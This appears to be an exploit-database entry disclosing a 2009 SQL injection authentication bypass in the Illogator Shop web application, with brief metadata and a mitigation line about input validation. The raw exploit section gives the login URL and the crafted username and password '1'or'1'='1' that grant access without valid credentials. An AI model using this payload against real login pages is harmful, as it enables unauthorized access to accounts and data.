Illogator Shop SQL Injection Bypass

vendor:

Shop

by:

bi0

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Shop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Illogator Shop SQL Injection Bypass

A SQL injection vulnerability exists in Illogator Shop, which allows an attacker to bypass authentication by providing a crafted username and password. The crafted username and password are '1'or'1'='1'. This allows an attacker to gain access to the application without providing valid credentials.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Title: Illogator Shop SQL Injection Bypass
# Date: 11/12/2009
# Author: bi0
# CVE : ()
                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/


[#]----------------------------------------------------------------[#]
#
# [x] Illogator Shop SQL Injection Bypass
# [x] Author : bi0
# [x] Contact : bukibv@hotmail.com
#
[#]----------------------------------------------------------------[#]
#
# [x] Exploit :
#
#    http://example.com/index.php?section=login
#
#    user : 1'or'1'='1
#    pass : 1'or'1'='1
#
[#]----------------------------------------------------------------[#]

#EOF